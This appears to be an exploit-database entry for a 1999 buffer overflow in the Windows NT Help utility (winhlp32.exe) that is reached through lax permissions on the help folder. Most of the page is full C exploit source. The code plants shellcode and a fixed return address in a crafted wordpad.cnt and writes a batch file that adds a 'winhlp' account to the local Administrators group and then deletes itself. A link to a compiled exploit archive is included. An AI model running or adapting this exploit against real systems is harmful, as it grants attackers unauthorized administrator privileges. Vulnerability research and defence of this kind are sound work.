Lax permission in Windows NT help file folder and buffer overflow in Help utility

vendor:

Windows NT

by:

Unknown

7.5

CVSS

HIGH

Privilege Escalation

119

CWE

Product Name: Windows NT

Affected Version From: Windows NT (version not mentioned)

Affected Version To: Windows NT (version not mentioned)

Patch Exists: NO

Related CWE: CVE not mentioned

CPE: o:microsoft:windows_nt

Other Scripts:

Platforms Tested: Windows NT (specific versions not mentioned)

Unknown

Lax permission in Windows NT help file folder and buffer overflow in Help utility

The Windows NT Help utility has a buffer overflow vulnerability when parsing .cnt files with long heading strings. This vulnerability allows a malicious user to create a custom .cnt file with executable code in an entry string, which can grant them Administrator privileges when viewed by an unsuspecting user. The vulnerability is not limited by the permissions of the help file directory as the Help utility will search for a .cnt file first in its execution directory before looking in the help file directory.

Mitigation:

Apply patches or updates provided by the vendor. Restrict write access to the help file directory. Avoid viewing help files from untrusted sources.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/261/info
// 
// Lax permission in the Windows NT help file folder and a buffer overflow in the Help utility may allow malicious users to gain Administrator privileges.
// 
// The Windows NT Help utility parses and displays help information for selected applications. The help files are stored in the %SystemRoot%\help directory. The default permissions in this directory allow any user to add new files.
// 
// A buffer overflow exists in the Help utility when it attempts to read a .cnt file with an overly long heading string. Content tab informaton files ("".cnt"") are generated when rich text format files ("".rtf"") are translated to help files ("".hlp""). If the string is longer than 507 bytes winhlp32 truncates the entry and the buffer overflow does not occur.
// 
// A malicious user can create a custom .cnt help file with executable code in an entry string which when stored in the help directory and viewed by an unsuspecting user can grant them that users privileges.
// 
// The vulnerability is not limited by the permissions of the help file directory as the Help utility will search for a .cnt file first in its execution directory before looking in the help file directory.
// 
#include <stdio.h>
#include <windows.h>
#include <string.h>

int main(void)
{
 char eip[5]=""\xE5\x27\xF3\x77"";
 char
ExploitCode[200]=""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38\xF1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\xFF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC"";

 FILE *fd;
 printf(""\n\n*******************************************************\n"");
 printf(""* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n"");
 printf(""*   This version runs on Service Pack 4 machines and  *\n"");
 printf(""*       assumes a msvcrt.dll version of 4.00.6201     *\n"");
 printf(""*                                                     *\n"");
 printf(""* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n"");
 printf(""*******************************************************\n\n"");

 fd = fopen(""wordpad.cnt"", ""r"");
 if (fd==NULL)
  {
   printf(""\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory"");
   return 0;
  }
 fclose(fd);
 printf(""\nMaking a copy of real wordpad.cnt - wordpad.sav\n"");
 system(""copy wordpad.cnt wordpad.sav"");
 printf(""\n\nCreating wordpad.cnt with exploit code..."");
 fd = fopen(""wordpad.cnt"", ""w+"");
 if (fd==NULL)
  {
   printf(""Failed to open wordpad.cnt in write mode. Check you have sufficent rights\n"");
   return 0;
  }
 fprintf(fd,""1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n"",eip,ExploitCode);

 fprintf(fd,""2 Opening a document=WRIPAD_OPEN_DOC\n"");
 fclose(fd);
 printf(""\nCreating batch file add.bat\n\n"");
 fd = fopen(""add.bat"", ""w"");
 if (fd == NULL)
  {
   printf(""Couldn't create batch file. Manually create one instead"");
   return 0;
  }
 printf(""The batch file will attempt to create a user account called \""winhlp\"" and\n"");
 printf(""with a password of \""winhlp!!\"" and add it to the Local Administrators group.\n"");
 printf(""Once this is done it will reset the files and delete itself.\n"");
 fprintf(fd,""net user winhlp winhlp!! /add\n"");
 fprintf(fd,""net localgroup administrators winhlp /add\n"");
 fprintf(fd,""del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n"");
 fprintf(fd,""del wordpad.sav\n"");
 fprintf(fd,""del add.bat\n"");
 fclose(fd);
 printf(""\nBatch file created."");
 printf(""\n\nCreated. Now open up Wordpad and click on Help\n"");

 return 0;


}

NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19209.tar.gz